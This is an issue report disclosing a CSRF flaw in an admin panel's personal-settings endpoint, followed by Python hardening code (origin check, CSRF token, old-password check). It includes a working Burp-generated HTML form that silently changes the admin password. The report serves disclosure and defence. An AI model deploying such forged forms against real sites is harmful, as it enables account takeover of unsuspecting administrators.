
There is a CSRF vulnerability in the personal settings

aQme opened this issue (status: Open, 0 comments)

  1. First, log in to the backend and click Personal Settings. There is no captcha here and no requirement to verify the old password, so try CSRF. [screenshot: personalsettings]

  2. Then enter any password, for example '777777', click Submit, and capture the request in Burp Suite. [screenshot: updatesuccess]

  3. Use the request captured in step 2 to generate a CSRF PoC, then open the PoC page in the same browser.
     CSRF PoC:

     ```html
     <html>
       <!-- CSRF PoC - generated by Burp Suite Professional -->
       <body>
         <script>history.pushState('', '', '/')</script>
         <form action="http://192.168.190.137/admin/index/editUserinfo" method="POST">
           <input type="hidden" name="username" value="admin" />
           <input type="hidden" name="password" value="777777" />
           <input type="hidden" name="email" value="123&#64;qq&#46;com" />
           <input type="submit" value="Submit request" />
         </form>
       </body>
     </html>
     ```

[screenshots: csrfpoc, changesuccess]

aQme, Apr 19 '23 07:04
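The report above shows that `editUserinfo` accepts a cross-site POST with only the session cookie as proof of intent, and that a password change needs no knowledge of the current password. The following is an added example, not API-Admin's own code, of the three server-side checks that close this gap: an Origin/Referer check, a synchronizer CSRF token, and re-authentication before a password change. The session/request model, field names `csrf_token` and `old_password`, and the `attacker.example` origin are constructed for the demo; the panel origin is taken from the PoC's form action.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

ADMIN_ORIGIN = "http://192.168.190.137"  # the panel's own origin, from the PoC form action


def hash_password(pw: str, salt: bytes = b"") -> bytes:
    """Salted PBKDF2, salt stored in front of the digest (production code would use argon2/bcrypt)."""
    salt = salt or secrets.token_bytes(16)
    return salt + hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 100_000)


def password_matches(stored: bytes, candidate: str) -> bool:
    # Constant-time compare against a re-derivation with the stored salt
    return hmac.compare_digest(stored, hash_password(candidate, stored[:16]))


@dataclass
class Session:
    user: str
    password_hash: bytes
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))  # per-session secret


def origin_allowed(headers: dict) -> bool:
    """Browsers attach Origin (or at least Referer) to cross-site POSTs; only the panel's own origin passes."""
    src = headers.get("Origin") or headers.get("Referer", "")
    return src == ADMIN_ORIGIN or src.startswith(ADMIN_ORIGIN + "/")


def edit_userinfo(session: Session, headers: dict, form: dict) -> tuple:
    """Hardened handler for /admin/index/editUserinfo; returns (http_status, message)."""
    if not origin_allowed(headers):
        return 403, "cross-site request rejected"
    # Synchronizer token: a page on another origin cannot read it, so a forged form cannot supply it
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return 403, "missing or invalid CSRF token"
    if "password" in form:
        # Re-authenticate before a password change, the check the issue notes is absent
        if not password_matches(session.password_hash, form.get("old_password", "")):
            return 403, "current password required to set a new password"
        session.password_hash = hash_password(form["password"])
    return 200, "updated"


if __name__ == "__main__":
    s = Session("admin", hash_password("admin"))
    # Constructed replay of the Burp PoC: foreign Origin, no token, no old password
    forged = {"username": "admin", "password": "777777", "email": "123@qq.com"}
    print(edit_userinfo(s, {"Origin": "http://attacker.example"}, forged))  # (403, ...)
```

The Origin check alone is not enough on its own (some clients strip Referer, and it does nothing for same-origin injection), which is why the token and the old-password check are layered on top.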